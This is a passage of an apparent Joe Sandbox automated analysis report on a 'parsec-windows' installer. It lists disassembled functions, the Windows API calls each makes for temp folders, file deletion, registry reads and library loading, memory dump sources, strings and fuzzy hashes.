                                • Part of subcall function 0040559F: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\), ref: 0040560C
                                • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                              • String ID: "C:\Program Files\Parsec\parsecd.exe"$C:\Program Files\Parsec$C:\Program Files\Parsec
                              • API String ID: 1941528284-119262318
                              • Opcode ID: 4839ee79086c8b8022f98973fbd435c3aafa34f7a6cbb40833a8578369c14881
                              • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                              • Opcode Fuzzy Hash: 4839ee79086c8b8022f98973fbd435c3aafa34f7a6cbb40833a8578369c14881
                              • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                              Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                              • GlobalFree.KERNEL32(?), ref: 00402A06
                              • GlobalFree.KERNEL32(00000000), ref: 00402A19
                              • CloseHandle.KERNELBASE(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                              • String ID:
                              • API String ID: 2667972263-0
                              • Opcode ID: b08a2a5b1b2e1d0bcef1cc982031fdde2dbf0f80dbef9f93f85a0cd55b57b722
                              • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                              • Opcode Fuzzy Hash: b08a2a5b1b2e1d0bcef1cc982031fdde2dbf0f80dbef9f93f85a0cd55b57b722
                              • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                              Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 871 405a6e-405ab9 CreateDirectoryW 872 405abb-405abd 871->872 873 405abf-405acc GetLastError 871->873 874 405ae6-405ae8 872->874 873->874 875 405ace-405ae2 SetFileSecurityW 873->875 875->872 876 405ae4 GetLastError 875->876 876->874
                              APIs
                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                              • GetLastError.KERNEL32 ref: 00405AC5
                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                              • GetLastError.KERNEL32 ref: 00405AE4
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              • API String ID: 3449924974-823278215
                              • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                              • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                              • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                              • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                              Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: MessageSend$Timeout
                              • String ID: !
                              • API String ID: 1777923405-2657877971
                              • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                              • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                              • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                              • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                              Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                              • wsprintfW.USER32 ref: 00404DF0
                              • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: ItemTextlstrlenwsprintf
                              • String ID: %u.%u%s%s
                              • API String ID: 3540041739-3551169577
                              • Opcode ID: ef5a487acd93c416279d422af54232d8d0333c49029b07dfc4f1175e68c26d0a
                              • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                              • Opcode Fuzzy Hash: ef5a487acd93c416279d422af54232d8d0333c49029b07dfc4f1175e68c26d0a
                              • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                              Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              • GetTickCount.KERNEL32 ref: 0040607A
                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: CountFileNameTempTick
                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                              • API String ID: 1716503409-44229769
                              • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                              • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                              • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                              • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                              Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Remove folder: ,?,?,00406672,80000002), ref: 00406451
                              • RegCloseKey.KERNELBASE(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\), ref: 0040645C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: CloseQueryValue
                              • String ID: Remove folder:
                              • API String ID: 3356406503-1958208860
                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                              • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                              • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                              Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              • FreeLibrary.KERNELBASE(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                              • GlobalFree.KERNEL32(?), ref: 00403B78
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: Free$GlobalLibrary
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              • API String ID: 1100898210-823278215
                              • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                              • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                              • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                              • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                              Function 00405C01 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00406008: GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                • Part of subcall function 00406008: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C1C
                              • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C24
                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C3C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: File$Attributes$DeleteDirectoryRemove
                              • String ID:
                              • API String ID: 1655745494-0
                              • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                              • Instruction ID: 0274c5225d47ddc366315f3a2fda4b694ad97aa72442a0e2fcdbaf00fd257d87
                              • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                              • Instruction Fuzzy Hash: F4E0E53110CF9156E61457309E08F5F2AD8EF86715F05493EF892B10C0CBB848068E6A
                              Function 00404472 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000408,?,00000000,004040D1), ref: 00404490
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: x
                              • API String ID: 3850602802-2363233923
                              • Opcode ID: 6afabcb65d7cd0472edcecb82606307073186cf957424f1b3ed57c3b76b5cfb8
                              • Instruction ID: 1b38e0d23eed931a714c5b599c5829f4d2050063c4158495342b67dc2c27a344
                              • Opcode Fuzzy Hash: 6afabcb65d7cd0472edcecb82606307073186cf957424f1b3ed57c3b76b5cfb8
                              • Instruction Fuzzy Hash: 10C01271140200EACB004B00DE01F0A7A20B7A0B02F209039F381210B087B05422DB0C
                              Function 00405672 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                              Download Yara Rule
                              APIs
                              • OleInitialize.OLE32(00000000), ref: 00405682
                                • Part of subcall function 004044E5: SendMessageW.USER32(000204F8,00000000,00000000,00000000), ref: 004044F7
                              • CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 004056CE
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: InitializeMessageSendUninitialize
                              • String ID:
                              • API String ID: 2896919175-0
                              • Opcode ID: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                              • Instruction ID: 6be4ff692d487ef8b3e25caebddd25c5d55207980f196ef2193ccf2f8785d180
                              • Opcode Fuzzy Hash: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                              • Instruction Fuzzy Hash: B3F0F0765006009AE6115B95A901BA677A8EBD4316F49883AEF88632E0CB365C418A1C
                              Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                • Part of subcall function 0040689A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406900
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                              • String ID:
                              • API String ID: 2547128583-0
                              • Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                              • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                              • Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                              • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                              Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                              Download Yara Rule
                              APIs
                              • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
